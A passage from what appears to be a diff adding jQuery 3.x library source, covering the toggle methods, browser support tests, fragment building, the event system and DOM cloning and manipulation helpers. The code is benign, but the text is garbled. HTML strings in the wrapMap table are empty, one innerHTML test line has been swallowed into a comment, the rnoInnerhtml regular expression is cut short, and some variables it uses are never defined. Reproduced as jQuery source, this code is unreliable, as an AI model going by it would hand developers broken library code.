}, + hide: function() { + return showHide( this ); + }, + toggle: function( state ) { + if ( typeof state === "boolean" ) { + return state ? this.show() : this.hide(); + } + + return this.each( function() { + if ( isHiddenWithinTree( this ) ) { + jQuery( this ).show(); + } else { + jQuery( this ).hide(); + } + } ); + } +} ); +var rcheckableType = ( /^(?:checkbox|radio)$/i ); + +var rtagName = ( /<([a-z][^\/\0>\x20\t\r\n\f]*)/i ); + +var rscriptType = ( /^$|^module$|\/(?:java|ecma)script/i ); + + + +( function() { + var fragment = document.createDocumentFragment(), + div = fragment.appendChild( document.createElement( "div" ) ), + input = document.createElement( "input" ); + + // Support: Android 4.0 - 4.3 only + // Check state lost if the name is set (#11217) + // Support: Windows Web Apps (WWA) + // `name` and `type` must use .setAttribute for WWA (#14901) + input.setAttribute( "type", "radio" ); + input.setAttribute( "checked", "checked" ); + input.setAttribute( "name", "t" ); + + div.appendChild( input ); + + // Support: Android <=4.1 only + // Older WebKit doesn't clone checked state correctly in fragments + support.checkClone = div.cloneNode( true ).cloneNode( true ).lastChild.checked; + + // Support: IE <=11 only + // Make sure textarea (and checkbox) defaultValue is properly cloned + div.innerHTML = ""; + support.noCloneChecked = !!div.cloneNode( true ).lastChild.defaultValue; + + // Support: IE <=9 only + // IE <=9 replaces "; + support.option = !!div.lastChild; +} )(); + + +// We have to close these tags to support XHTML (#13200) +var wrapMap = { + + // XHTML parsers do not magically insert elements in the + // same way that tag soup parsers do. So we cannot shorten + // this by omitting or other required elements. + thead: [ 1, "", "
    " ], + col: [ 2, "", "
    " ], + tr: [ 2, "", "
    " ], + td: [ 3, "", "
    " ], + + _default: [ 0, "", "" ] +}; + +wrapMap.tbody = wrapMap.tfoot = wrapMap.colgroup = wrapMap.caption = wrapMap.thead; +wrapMap.th = wrapMap.td; + +// Support: IE <=9 only +if ( !support.option ) { + wrapMap.optgroup = wrapMap.option = [ 1, "" ]; +} + + +function getAll( context, tag ) { + + // Support: IE <=9 - 11 only + // Use typeof to avoid zero-argument method invocation on host objects (#15151) + var ret; + + if ( typeof context.getElementsByTagName !== "undefined" ) { + ret = context.getElementsByTagName( tag || "*" ); + + } else if ( typeof context.querySelectorAll !== "undefined" ) { + ret = context.querySelectorAll( tag || "*" ); + + } else { + ret = []; + } + + if ( tag === undefined || tag && nodeName( context, tag ) ) { + return jQuery.merge( [ context ], ret ); + } + + return ret; +} + + +// Mark scripts as having already been evaluated +function setGlobalEval( elems, refElements ) { + var i = 0, + l = elems.length; + + for ( ; i < l; i++ ) { + dataPriv.set( + elems[ i ], + "globalEval", + !refElements || dataPriv.get( refElements[ i ], "globalEval" ) + ); + } +} + + +var rhtml = /<|&#?\w+;/; + +function buildFragment( elems, context, scripts, selection, ignored ) { + var elem, tmp, tag, wrap, attached, j, + fragment = context.createDocumentFragment(), + nodes = [], + i = 0, + l = elems.length; + + for ( ; i < l; i++ ) { + elem = elems[ i ]; + + if ( elem || elem === 0 ) { + + // Add nodes directly + if ( toType( elem ) === "object" ) { + + // Support: Android <=4.0 only, PhantomJS 1 only + // push.apply(_, arraylike) throws on ancient WebKit + jQuery.merge( nodes, elem.nodeType ? [ elem ] : elem ); + + // Convert non-html into a text node + } else if ( !rhtml.test( elem ) ) { + nodes.push( context.createTextNode( elem ) ); + + // Convert html into DOM nodes + } else { + tmp = tmp || fragment.appendChild( context.createElement( "div" ) ); + + // Deserialize a standard representation + tag = ( rtagName.exec( elem ) || [ "", "" ] )[ 1 ].toLowerCase(); + wrap = wrapMap[ tag ] || wrapMap._default; + tmp.innerHTML = wrap[ 1 ] + jQuery.htmlPrefilter( elem ) + wrap[ 2 ]; + + // Descend through wrappers to the right content + j = wrap[ 0 ]; + while ( j-- ) { + tmp = tmp.lastChild; + } + + // Support: Android <=4.0 only, PhantomJS 1 only + // push.apply(_, arraylike) throws on ancient WebKit + jQuery.merge( nodes, tmp.childNodes ); + + // Remember the top-level container + tmp = fragment.firstChild; + + // Ensure the created nodes are orphaned (#12392) + tmp.textContent = ""; + } + } + } + + // Remove wrapper from fragment + fragment.textContent = ""; + + i = 0; + while ( ( elem = nodes[ i++ ] ) ) { + + // Skip elements already in the context collection (trac-4087) + if ( selection && jQuery.inArray( elem, selection ) > -1 ) { + if ( ignored ) { + ignored.push( elem ); + } + continue; + } + + attached = isAttached( elem ); + + // Append to fragment + tmp = getAll( fragment.appendChild( elem ), "script" ); + + // Preserve script evaluation history + if ( attached ) { + setGlobalEval( tmp ); + } + + // Capture executables + if ( scripts ) { + j = 0; + while ( ( elem = tmp[ j++ ] ) ) { + if ( rscriptType.test( elem.type || "" ) ) { + scripts.push( elem ); + } + } + } + } + + return fragment; +} + + +var + rkeyEvent = /^key/, + rmouseEvent = /^(?:mouse|pointer|contextmenu|drag|drop)|click/, + rtypenamespace = /^([^.]*)(?:\.(.+)|)/; + +function returnTrue() { + return true; +} + +function returnFalse() { + return false; +} + +// Support: IE <=9 - 11+ +// focus() and blur() are asynchronous, except when they are no-op. +// So expect focus to be synchronous when the element is already active, +// and blur to be synchronous when the element is not already active. +// (focus and blur are always synchronous in other supported browsers, +// this just defines when we can count on it). +function expectSync( elem, type ) { + return ( elem === safeActiveElement() ) === ( type === "focus" ); +} + +// Support: IE <=9 only +// Accessing document.activeElement can throw unexpectedly +// https://bugs.jquery.com/ticket/13393 +function safeActiveElement() { + try { + return document.activeElement; + } catch ( err ) { } +} + +function on( elem, types, selector, data, fn, one ) { + var origFn, type; + + // Types can be a map of types/handlers + if ( typeof types === "object" ) { + + // ( types-Object, selector, data ) + if ( typeof selector !== "string" ) { + + // ( types-Object, data ) + data = data || selector; + selector = undefined; + } + for ( type in types ) { + on( elem, type, selector, data, types[ type ], one ); + } + return elem; + } + + if ( data == null && fn == null ) { + + // ( types, fn ) + fn = selector; + data = selector = undefined; + } else if ( fn == null ) { + if ( typeof selector === "string" ) { + + // ( types, selector, fn ) + fn = data; + data = undefined; + } else { + + // ( types, data, fn ) + fn = data; + data = selector; + selector = undefined; + } + } + if ( fn === false ) { + fn = returnFalse; + } else if ( !fn ) { + return elem; + } + + if ( one === 1 ) { + origFn = fn; + fn = function( event ) { + + // Can use an empty set, since event contains the info + jQuery().off( event ); + return origFn.apply( this, arguments ); + }; + + // Use same guid so caller can remove using origFn + fn.guid = origFn.guid || ( origFn.guid = jQuery.guid++ ); + } + return elem.each( function() { + jQuery.event.add( this, types, fn, data, selector ); + } ); +} + +/* + * Helper functions for managing events -- not part of the public interface. + * Props to Dean Edwards' addEvent library for many of the ideas. + */ +jQuery.event = { + + global: {}, + + add: function( elem, types, handler, data, selector ) { + + var handleObjIn, eventHandle, tmp, + events, t, handleObj, + special, handlers, type, namespaces, origType, + elemData = dataPriv.get( elem ); + + // Only attach events to objects that accept data + if ( !acceptData( elem ) ) { + return; + } + + // Caller can pass in an object of custom data in lieu of the handler + if ( handler.handler ) { + handleObjIn = handler; + handler = handleObjIn.handler; + selector = handleObjIn.selector; + } + + // Ensure that invalid selectors throw exceptions at attach time + // Evaluate against documentElement in case elem is a non-element node (e.g., document) + if ( selector ) { + jQuery.find.matchesSelector( documentElement, selector ); + } + + // Make sure that the handler has a unique ID, used to find/remove it later + if ( !handler.guid ) { + handler.guid = jQuery.guid++; + } + + // Init the element's event structure and main handler, if this is the first + if ( !( events = elemData.events ) ) { + events = elemData.events = Object.create( null ); + } + if ( !( eventHandle = elemData.handle ) ) { + eventHandle = elemData.handle = function( e ) { + + // Discard the second event of a jQuery.event.trigger() and + // when an event is called after a page has unloaded + return typeof jQuery !== "undefined" && jQuery.event.triggered !== e.type ? + jQuery.event.dispatch.apply( elem, arguments ) : undefined; + }; + } + + // Handle multiple events separated by a space + types = ( types || "" ).match( rnothtmlwhite ) || [ "" ]; + t = types.length; + while ( t-- ) { + tmp = rtypenamespace.exec( types[ t ] ) || []; + type = origType = tmp[ 1 ]; + namespaces = ( tmp[ 2 ] || "" ).split( "." ).sort(); + + // There *must* be a type, no attaching namespace-only handlers + if ( !type ) { + continue; + } + + // If event changes its type, use the special event handlers for the changed type + special = jQuery.event.special[ type ] || {}; + + // If selector defined, determine special event api type, otherwise given type + type = ( selector ? special.delegateType : special.bindType ) || type; + + // Update special based on newly reset type + special = jQuery.event.special[ type ] || {}; + + // handleObj is passed to all event handlers + handleObj = jQuery.extend( { + type: type, + origType: origType, + data: data, + handler: handler, + guid: handler.guid, + selector: selector, + needsContext: selector && jQuery.expr.match.needsContext.test( selector ), + namespace: namespaces.join( "." ) + }, handleObjIn ); + + // Init the event handler queue if we're the first + if ( !( handlers = events[ type ] ) ) { + handlers = events[ type ] = []; + handlers.delegateCount = 0; + + // Only use addEventListener if the special events handler returns false + if ( !special.setup || + special.setup.call( elem, data, namespaces, eventHandle ) === false ) { + + if ( elem.addEventListener ) { + elem.addEventListener( type, eventHandle ); + } + } + } + + if ( special.add ) { + special.add.call( elem, handleObj ); + + if ( !handleObj.handler.guid ) { + handleObj.handler.guid = handler.guid; + } + } + + // Add to the element's handler list, delegates in front + if ( selector ) { + handlers.splice( handlers.delegateCount++, 0, handleObj ); + } else { + handlers.push( handleObj ); + } + + // Keep track of which events have ever been used, for event optimization + jQuery.event.global[ type ] = true; + } + + }, + + // Detach an event or set of events from an element + remove: function( elem, types, handler, selector, mappedTypes ) { + + var j, origCount, tmp, + events, t, handleObj, + special, handlers, type, namespaces, origType, + elemData = dataPriv.hasData( elem ) && dataPriv.get( elem ); + + if ( !elemData || !( events = elemData.events ) ) { + return; + } + + // Once for each type.namespace in types; type may be omitted + types = ( types || "" ).match( rnothtmlwhite ) || [ "" ]; + t = types.length; + while ( t-- ) { + tmp = rtypenamespace.exec( types[ t ] ) || []; + type = origType = tmp[ 1 ]; + namespaces = ( tmp[ 2 ] || "" ).split( "." ).sort(); + + // Unbind all events (on this namespace, if provided) for the element + if ( !type ) { + for ( type in events ) { + jQuery.event.remove( elem, type + types[ t ], handler, selector, true ); + } + continue; + } + + special = jQuery.event.special[ type ] || {}; + type = ( selector ? special.delegateType : special.bindType ) || type; + handlers = events[ type ] || []; + tmp = tmp[ 2 ] && + new RegExp( "(^|\\.)" + namespaces.join( "\\.(?:.*\\.|)" ) + "(\\.|$)" ); + + // Remove matching events + origCount = j = handlers.length; + while ( j-- ) { + handleObj = handlers[ j ]; + + if ( ( mappedTypes || origType === handleObj.origType ) && + ( !handler || handler.guid === handleObj.guid ) && + ( !tmp || tmp.test( handleObj.namespace ) ) && + ( !selector || selector === handleObj.selector || + selector === "**" && handleObj.selector ) ) { + handlers.splice( j, 1 ); + + if ( handleObj.selector ) { + handlers.delegateCount--; + } + if ( special.remove ) { + special.remove.call( elem, handleObj ); + } + } + } + + // Remove generic event handler if we removed something and no more handlers exist + // (avoids potential for endless recursion during removal of special event handlers) + if ( origCount && !handlers.length ) { + if ( !special.teardown || + special.teardown.call( elem, namespaces, elemData.handle ) === false ) { + + jQuery.removeEvent( elem, type, elemData.handle ); + } + + delete events[ type ]; + } + } + + // Remove data and the expando if it's no longer used + if ( jQuery.isEmptyObject( events ) ) { + dataPriv.remove( elem, "handle events" ); + } + }, + + dispatch: function( nativeEvent ) { + + var i, j, ret, matched, handleObj, handlerQueue, + args = new Array( arguments.length ), + + // Make a writable jQuery.Event from the native event object + event = jQuery.event.fix( nativeEvent ), + + handlers = ( + dataPriv.get( this, "events" ) || Object.create( null ) + )[ event.type ] || [], + special = jQuery.event.special[ event.type ] || {}; + + // Use the fix-ed jQuery.Event rather than the (read-only) native event + args[ 0 ] = event; + + for ( i = 1; i < arguments.length; i++ ) { + args[ i ] = arguments[ i ]; + } + + event.delegateTarget = this; + + // Call the preDispatch hook for the mapped type, and let it bail if desired + if ( special.preDispatch && special.preDispatch.call( this, event ) === false ) { + return; + } + + // Determine handlers + handlerQueue = jQuery.event.handlers.call( this, event, handlers ); + + // Run delegates first; they may want to stop propagation beneath us + i = 0; + while ( ( matched = handlerQueue[ i++ ] ) && !event.isPropagationStopped() ) { + event.currentTarget = matched.elem; + + j = 0; + while ( ( handleObj = matched.handlers[ j++ ] ) && + !event.isImmediatePropagationStopped() ) { + + // If the event is namespaced, then each handler is only invoked if it is + // specially universal or its namespaces are a superset of the event's. + if ( !event.rnamespace || handleObj.namespace === false || + event.rnamespace.test( handleObj.namespace ) ) { + + event.handleObj = handleObj; + event.data = handleObj.data; + + ret = ( ( jQuery.event.special[ handleObj.origType ] || {} ).handle || + handleObj.handler ).apply( matched.elem, args ); + + if ( ret !== undefined ) { + if ( ( event.result = ret ) === false ) { + event.preventDefault(); + event.stopPropagation(); + } + } + } + } + } + + // Call the postDispatch hook for the mapped type + if ( special.postDispatch ) { + special.postDispatch.call( this, event ); + } + + return event.result; + }, + + handlers: function( event, handlers ) { + var i, handleObj, sel, matchedHandlers, matchedSelectors, + handlerQueue = [], + delegateCount = handlers.delegateCount, + cur = event.target; + + // Find delegate handlers + if ( delegateCount && + + // Support: IE <=9 + // Black-hole SVG instance trees (trac-13180) + cur.nodeType && + + // Support: Firefox <=42 + // Suppress spec-violating clicks indicating a non-primary pointer button (trac-3861) + // https://www.w3.org/TR/DOM-Level-3-Events/#event-type-click + // Support: IE 11 only + // ...but not arrow key "clicks" of radio inputs, which can have `button` -1 (gh-2343) + !( event.type === "click" && event.button >= 1 ) ) { + + for ( ; cur !== this; cur = cur.parentNode || this ) { + + // Don't check non-elements (#13208) + // Don't process clicks on disabled elements (#6911, #8165, #11382, #11764) + if ( cur.nodeType === 1 && !( event.type === "click" && cur.disabled === true ) ) { + matchedHandlers = []; + matchedSelectors = {}; + for ( i = 0; i < delegateCount; i++ ) { + handleObj = handlers[ i ]; + + // Don't conflict with Object.prototype properties (#13203) + sel = handleObj.selector + " "; + + if ( matchedSelectors[ sel ] === undefined ) { + matchedSelectors[ sel ] = handleObj.needsContext ? + jQuery( sel, this ).index( cur ) > -1 : + jQuery.find( sel, this, null, [ cur ] ).length; + } + if ( matchedSelectors[ sel ] ) { + matchedHandlers.push( handleObj ); + } + } + if ( matchedHandlers.length ) { + handlerQueue.push( { elem: cur, handlers: matchedHandlers } ); + } + } + } + } + + // Add the remaining (directly-bound) handlers + cur = this; + if ( delegateCount < handlers.length ) { + handlerQueue.push( { elem: cur, handlers: handlers.slice( delegateCount ) } ); + } + + return handlerQueue; + }, + + addProp: function( name, hook ) { + Object.defineProperty( jQuery.Event.prototype, name, { + enumerable: true, + configurable: true, + + get: isFunction( hook ) ? + function() { + if ( this.originalEvent ) { + return hook( this.originalEvent ); + } + } : + function() { + if ( this.originalEvent ) { + return this.originalEvent[ name ]; + } + }, + + set: function( value ) { + Object.defineProperty( this, name, { + enumerable: true, + configurable: true, + writable: true, + value: value + } ); + } + } ); + }, + + fix: function( originalEvent ) { + return originalEvent[ jQuery.expando ] ? + originalEvent : + new jQuery.Event( originalEvent ); + }, + + special: { + load: { + + // Prevent triggered image.load events from bubbling to window.load + noBubble: true + }, + click: { + + // Utilize native event to ensure correct state for checkable inputs + setup: function( data ) { + + // For mutual compressibility with _default, replace `this` access with a local var. + // `|| data` is dead code meant only to preserve the variable through minification. + var el = this || data; + + // Claim the first handler + if ( rcheckableType.test( el.type ) && + el.click && nodeName( el, "input" ) ) { + + // dataPriv.set( el, "click", ... ) + leverageNative( el, "click", returnTrue ); + } + + // Return false to allow normal processing in the caller + return false; + }, + trigger: function( data ) { + + // For mutual compressibility with _default, replace `this` access with a local var. + // `|| data` is dead code meant only to preserve the variable through minification. + var el = this || data; + + // Force setup before triggering a click + if ( rcheckableType.test( el.type ) && + el.click && nodeName( el, "input" ) ) { + + leverageNative( el, "click" ); + } + + // Return non-false to allow normal event-path propagation + return true; + }, + + // For cross-browser consistency, suppress native .click() on links + // Also prevent it if we're currently inside a leveraged native-event stack + _default: function( event ) { + var target = event.target; + return rcheckableType.test( target.type ) && + target.click && nodeName( target, "input" ) && + dataPriv.get( target, "click" ) || + nodeName( target, "a" ); + } + }, + + beforeunload: { + postDispatch: function( event ) { + + // Support: Firefox 20+ + // Firefox doesn't alert if the returnValue field is not set. + if ( event.result !== undefined && event.originalEvent ) { + event.originalEvent.returnValue = event.result; + } + } + } + } +}; + +// Ensure the presence of an event listener that handles manually-triggered +// synthetic events by interrupting progress until reinvoked in response to +// *native* events that it fires directly, ensuring that state changes have +// already occurred before other listeners are invoked. +function leverageNative( el, type, expectSync ) { + + // Missing expectSync indicates a trigger call, which must force setup through jQuery.event.add + if ( !expectSync ) { + if ( dataPriv.get( el, type ) === undefined ) { + jQuery.event.add( el, type, returnTrue ); + } + return; + } + + // Register the controller as a special universal handler for all event namespaces + dataPriv.set( el, type, false ); + jQuery.event.add( el, type, { + namespace: false, + handler: function( event ) { + var notAsync, result, + saved = dataPriv.get( this, type ); + + if ( ( event.isTrigger & 1 ) && this[ type ] ) { + + // Interrupt processing of the outer synthetic .trigger()ed event + // Saved data should be false in such cases, but might be a leftover capture object + // from an async native handler (gh-4350) + if ( !saved.length ) { + + // Store arguments for use when handling the inner native event + // There will always be at least one argument (an event object), so this array + // will not be confused with a leftover capture object. + saved = slice.call( arguments ); + dataPriv.set( this, type, saved ); + + // Trigger the native event and capture its result + // Support: IE <=9 - 11+ + // focus() and blur() are asynchronous + notAsync = expectSync( this, type ); + this[ type ](); + result = dataPriv.get( this, type ); + if ( saved !== result || notAsync ) { + dataPriv.set( this, type, false ); + } else { + result = {}; + } + if ( saved !== result ) { + + // Cancel the outer synthetic event + event.stopImmediatePropagation(); + event.preventDefault(); + return result.value; + } + + // If this is an inner synthetic event for an event with a bubbling surrogate + // (focus or blur), assume that the surrogate already propagated from triggering the + // native event and prevent that from happening again here. + // This technically gets the ordering wrong w.r.t. to `.trigger()` (in which the + // bubbling surrogate propagates *after* the non-bubbling base), but that seems + // less bad than duplication. + } else if ( ( jQuery.event.special[ type ] || {} ).delegateType ) { + event.stopPropagation(); + } + + // If this is a native event triggered above, everything is now in order + // Fire an inner synthetic event with the original arguments + } else if ( saved.length ) { + + // ...and capture the result + dataPriv.set( this, type, { + value: jQuery.event.trigger( + + // Support: IE <=9 - 11+ + // Extend with the prototype to reset the above stopImmediatePropagation() + jQuery.extend( saved[ 0 ], jQuery.Event.prototype ), + saved.slice( 1 ), + this + ) + } ); + + // Abort handling of the native event + event.stopImmediatePropagation(); + } + } + } ); +} + +jQuery.removeEvent = function( elem, type, handle ) { + + // This "if" is needed for plain objects + if ( elem.removeEventListener ) { + elem.removeEventListener( type, handle ); + } +}; + +jQuery.Event = function( src, props ) { + + // Allow instantiation without the 'new' keyword + if ( !( this instanceof jQuery.Event ) ) { + return new jQuery.Event( src, props ); + } + + // Event object + if ( src && src.type ) { + this.originalEvent = src; + this.type = src.type; + + // Events bubbling up the document may have been marked as prevented + // by a handler lower down the tree; reflect the correct value. + this.isDefaultPrevented = src.defaultPrevented || + src.defaultPrevented === undefined && + + // Support: Android <=2.3 only + src.returnValue === false ? + returnTrue : + returnFalse; + + // Create target properties + // Support: Safari <=6 - 7 only + // Target should not be a text node (#504, #13143) + this.target = ( src.target && src.target.nodeType === 3 ) ? + src.target.parentNode : + src.target; + + this.currentTarget = src.currentTarget; + this.relatedTarget = src.relatedTarget; + + // Event type + } else { + this.type = src; + } + + // Put explicitly provided properties onto the event object + if ( props ) { + jQuery.extend( this, props ); + } + + // Create a timestamp if incoming event doesn't have one + this.timeStamp = src && src.timeStamp || Date.now(); + + // Mark it as fixed + this[ jQuery.expando ] = true; +}; + +// jQuery.Event is based on DOM3 Events as specified by the ECMAScript Language Binding +// https://www.w3.org/TR/2003/WD-DOM-Level-3-Events-20030331/ecma-script-binding.html +jQuery.Event.prototype = { + constructor: jQuery.Event, + isDefaultPrevented: returnFalse, + isPropagationStopped: returnFalse, + isImmediatePropagationStopped: returnFalse, + isSimulated: false, + + preventDefault: function() { + var e = this.originalEvent; + + this.isDefaultPrevented = returnTrue; + + if ( e && !this.isSimulated ) { + e.preventDefault(); + } + }, + stopPropagation: function() { + var e = this.originalEvent; + + this.isPropagationStopped = returnTrue; + + if ( e && !this.isSimulated ) { + e.stopPropagation(); + } + }, + stopImmediatePropagation: function() { + var e = this.originalEvent; + + this.isImmediatePropagationStopped = returnTrue; + + if ( e && !this.isSimulated ) { + e.stopImmediatePropagation(); + } + + this.stopPropagation(); + } +}; + +// Includes all common event props including KeyEvent and MouseEvent specific props +jQuery.each( { + altKey: true, + bubbles: true, + cancelable: true, + changedTouches: true, + ctrlKey: true, + detail: true, + eventPhase: true, + metaKey: true, + pageX: true, + pageY: true, + shiftKey: true, + view: true, + "char": true, + code: true, + charCode: true, + key: true, + keyCode: true, + button: true, + buttons: true, + clientX: true, + clientY: true, + offsetX: true, + offsetY: true, + pointerId: true, + pointerType: true, + screenX: true, + screenY: true, + targetTouches: true, + toElement: true, + touches: true, + + which: function( event ) { + var button = event.button; + + // Add which for key events + if ( event.which == null && rkeyEvent.test( event.type ) ) { + return event.charCode != null ? event.charCode : event.keyCode; + } + + // Add which for click: 1 === left; 2 === middle; 3 === right + if ( !event.which && button !== undefined && rmouseEvent.test( event.type ) ) { + if ( button & 1 ) { + return 1; + } + + if ( button & 2 ) { + return 3; + } + + if ( button & 4 ) { + return 2; + } + + return 0; + } + + return event.which; + } +}, jQuery.event.addProp ); + +jQuery.each( { focus: "focusin", blur: "focusout" }, function( type, delegateType ) { + jQuery.event.special[ type ] = { + + // Utilize native event if possible so blur/focus sequence is correct + setup: function() { + + // Claim the first handler + // dataPriv.set( this, "focus", ... ) + // dataPriv.set( this, "blur", ... ) + leverageNative( this, type, expectSync ); + + // Return false to allow normal processing in the caller + return false; + }, + trigger: function() { + + // Force setup before trigger + leverageNative( this, type ); + + // Return non-false to allow normal event-path propagation + return true; + }, + + delegateType: delegateType + }; +} ); + +// Create mouseenter/leave events using mouseover/out and event-time checks +// so that event delegation works in jQuery. +// Do the same for pointerenter/pointerleave and pointerover/pointerout +// +// Support: Safari 7 only +// Safari sends mouseenter too often; see: +// https://bugs.chromium.org/p/chromium/issues/detail?id=470258 +// for the description of the bug (it existed in older Chrome versions as well). +jQuery.each( { + mouseenter: "mouseover", + mouseleave: "mouseout", + pointerenter: "pointerover", + pointerleave: "pointerout" +}, function( orig, fix ) { + jQuery.event.special[ orig ] = { + delegateType: fix, + bindType: fix, + + handle: function( event ) { + var ret, + target = this, + related = event.relatedTarget, + handleObj = event.handleObj; + + // For mouseenter/leave call the handler if related is outside the target. + // NB: No relatedTarget if the mouse left/entered the browser window + if ( !related || ( related !== target && !jQuery.contains( target, related ) ) ) { + event.type = handleObj.origType; + ret = handleObj.handler.apply( this, arguments ); + event.type = fix; + } + return ret; + } + }; +} ); + +jQuery.fn.extend( { + + on: function( types, selector, data, fn ) { + return on( this, types, selector, data, fn ); + }, + one: function( types, selector, data, fn ) { + return on( this, types, selector, data, fn, 1 ); + }, + off: function( types, selector, fn ) { + var handleObj, type; + if ( types && types.preventDefault && types.handleObj ) { + + // ( event ) dispatched jQuery.Event + handleObj = types.handleObj; + jQuery( types.delegateTarget ).off( + handleObj.namespace ? + handleObj.origType + "." + handleObj.namespace : + handleObj.origType, + handleObj.selector, + handleObj.handler + ); + return this; + } + if ( typeof types === "object" ) { + + // ( types-object [, selector] ) + for ( type in types ) { + this.off( type, selector, types[ type ] ); + } + return this; + } + if ( selector === false || typeof selector === "function" ) { + + // ( types [, fn] ) + fn = selector; + selector = undefined; + } + if ( fn === false ) { + fn = returnFalse; + } + return this.each( function() { + jQuery.event.remove( this, types, fn, selector ); + } ); + } +} ); + + +var + + // Support: IE <=10 - 11, Edge 12 - 13 only + // In IE/Edge using regex groups here causes severe slowdowns. + // See https://connect.microsoft.com/IE/feedback/details/1736512/ + rnoInnerhtml = /\s*$/g; + +// Prefer a tbody over its parent table for containing new rows +function manipulationTarget( elem, content ) { + if ( nodeName( elem, "table" ) && + nodeName( content.nodeType !== 11 ? content : content.firstChild, "tr" ) ) { + + return jQuery( elem ).children( "tbody" )[ 0 ] || elem; + } + + return elem; +} + +// Replace/restore the type attribute of script elements for safe DOM manipulation +function disableScript( elem ) { + elem.type = ( elem.getAttribute( "type" ) !== null ) + "/" + elem.type; + return elem; +} +function restoreScript( elem ) { + if ( ( elem.type || "" ).slice( 0, 5 ) === "true/" ) { + elem.type = elem.type.slice( 5 ); + } else { + elem.removeAttribute( "type" ); + } + + return elem; +} + +function cloneCopyEvent( src, dest ) { + var i, l, type, pdataOld, udataOld, udataCur, events; + + if ( dest.nodeType !== 1 ) { + return; + } + + // 1. Copy private data: events, handlers, etc. + if ( dataPriv.hasData( src ) ) { + pdataOld = dataPriv.get( src ); + events = pdataOld.events; + + if ( events ) { + dataPriv.remove( dest, "handle events" ); + + for ( type in events ) { + for ( i = 0, l = events[ type ].length; i < l; i++ ) { + jQuery.event.add( dest, type, events[ type ][ i ] ); + } + } + } + } + + // 2. Copy user data + if ( dataUser.hasData( src ) ) { + udataOld = dataUser.access( src ); + udataCur = jQuery.extend( {}, udataOld ); + + dataUser.set( dest, udataCur ); + } +} + +// Fix IE bugs, see support tests +function fixInput( src, dest ) { + var nodeName = dest.nodeName.toLowerCase(); + + // Fails to persist the checked state of a cloned checkbox or radio button. + if ( nodeName === "input" && rcheckableType.test( src.type ) ) { + dest.checked = src.checked; + + // Fails to return the selected option to the default selected state when cloning options + } else if ( nodeName === "input" || nodeName === "textarea" ) { + dest.defaultValue = src.defaultValue; + } +} + +function domManip( collection, args, callback, ignored ) { + + // Flatten any nested arrays + args = flat( args ); + + var fragment, first, scripts, hasScripts, node, doc, + i = 0, + l = collection.length, + iNoClone = l - 1, + value = args[ 0 ], + valueIsFunction = isFunction( value ); + + // We can't cloneNode fragments that contain checked, in WebKit + if ( valueIsFunction || + ( l > 1 && typeof value === "string" && + !support.checkClone && rchecked.test( value ) ) ) { + return collection.each( function( index ) { + var self = collection.eq( index ); + if ( valueIsFunction ) { + args[ 0 ] = value.call( this, index, self.html() ); + } + domManip( self, args, callback, ignored ); + } ); + } + + if ( l ) { + fragment = buildFragment( args, collection[ 0 ].ownerDocument, false, collection, ignored ); + first = fragment.firstChild; + + if ( fragment.childNodes.length === 1 ) { + fragment = first; + } + + // Require either new content or an interest in ignored elements to invoke the callback + if ( first || ignored ) { + scripts = jQuery.map( getAll( fragment, "script" ), disableScript ); + hasScripts = scripts.length; + + // Use the original fragment for the last item + // instead of the first because it can end up + // being emptied incorrectly in certain situations (#8070). + for ( ; i < l; i++ ) { + node = fragment; + + if ( i !== iNoClone ) { + node = jQuery.clone( node, true, true ); + + // Keep references to cloned scripts for later restoration + if ( hasScripts ) { + + // Support: Android <=4.0 only, PhantomJS 1 only + // push.apply(_, arraylike) throws on ancient WebKit + jQuery.merge( scripts, getAll( node, "script" ) ); + } + } + + callback.call( collection[ i ], node, i ); + } + + if ( hasScripts ) { + doc = scripts[ scripts.length - 1 ].ownerDocument; + + // Reenable scripts + jQuery.map( scripts, restoreScript ); + + // Evaluate executable scripts on first document insertion + for ( i = 0; i < hasScripts; i++ ) { + node = scripts[ i ]; + if ( rscriptType.test( node.type || "" ) && + !dataPriv.access( node, "globalEval" ) && + jQuery.contains( doc, node ) ) { + + if ( node.src && ( node.type || "" ).toLowerCase() !== "module" ) { + + // Optional AJAX dependency, but won't run scripts if not present + if ( jQuery._evalUrl && !node.noModule ) { + jQuery._evalUrl( node.src, { + nonce: node.nonce || node.getAttribute( "nonce" ) + }, doc ); + } + } else { + DOMEval( node.textContent.replace( rcleanScript, "" ), node, doc ); + } + } + } + } + } + } + + return collection; +} + +function remove( elem, selector, keepData ) { + var node, + nodes = selector ? jQuery.filter( selector, elem ) : elem, + i = 0; + + for ( ; ( node = nodes[ i ] ) != null; i++ ) { + if ( !keepData && node.nodeType === 1 ) { + jQuery.cleanData( getAll( node ) ); + } + + if ( node.parentNode ) { + if ( keepData && isAttached( node ) ) { + setGlobalEval( getAll( node, "script" ) ); + } + node.parentNode.removeChild( node ); + } + } + + return elem; +} + +jQuery.extend( { + htmlPrefilter: function( html ) { + return html; + }, + + clone: function( elem, dataAndEvents, deepDataAndEvents ) { + var i, l, srcElements, destElements, + clone = elem.cloneNode( true ), + inPage = isAttached( elem ); + + // Fix IE cloning issues + if ( !support.noCloneChecked && ( elem.nodeType === 1 || elem.nodeType === 11 ) && + !jQuery.isXMLDoc( elem ) ) { + + // We eschew Sizzle here for performance reasons: https://jsperf.com/getall-vs-sizzle/2 + destElements = getAll( clone ); + srcElements = getAll( elem ); + + for ( i = 0, l = srcElements.length; i < l; i++ ) { + fixInput( srcElements[ i ], destElements[ i ] ); + } + } + + // Copy the events from the original to the clone + if ( dataAndEvents ) { + if ( deepDataAndEvents ) { + srcElements = srcElements || getAll( elem ); + destElements = destElements || getAll( clone ); + + for ( i = 0, l = srcElements.length; i < l; i++ ) { + cloneCopyEvent( srcElements[ i ], destElements[ i ] ); + } + } else { + cloneCopyEvent( elem, clone ); + } + } + + // Preserve script evaluation history + destElements = getAll( clone, "script" ); + if ( destElements.length > 0 ) { + setGlobalEval( destElements, !inPage && getAll( elem, "script" ) ); + } + + // Return the cloned set + return clone; + }, + + cleanData: function( elems ) { + var data, elem, type, + special = jQuery.event.special, + i = 0; + + for ( ; ( elem = elems[ i ] ) !== undefined; i++ ) { + if ( acceptData( elem ) ) { + if ( ( data = elem[ dataPriv.expando ] ) ) { + if ( data.events ) { + for ( type in data.events ) { + if ( special[ type ] ) { + jQuery.event.remove( elem, type ); + + // This is a shortcut to avoid jQuery.event.remove's overhead + } else { + jQuery.removeEvent( elem, type, data.handle ); + } + } + } + + // Support: Chrome <=35 - 45+ + // Assign undefined instead of using delete, see Data#remove + elem[ dataPriv.expando ] = undefined; + } + if ( elem[ dataUser.expando ] ) { + + // Support: Chrome <=35 - 45+ + // Assign undefined 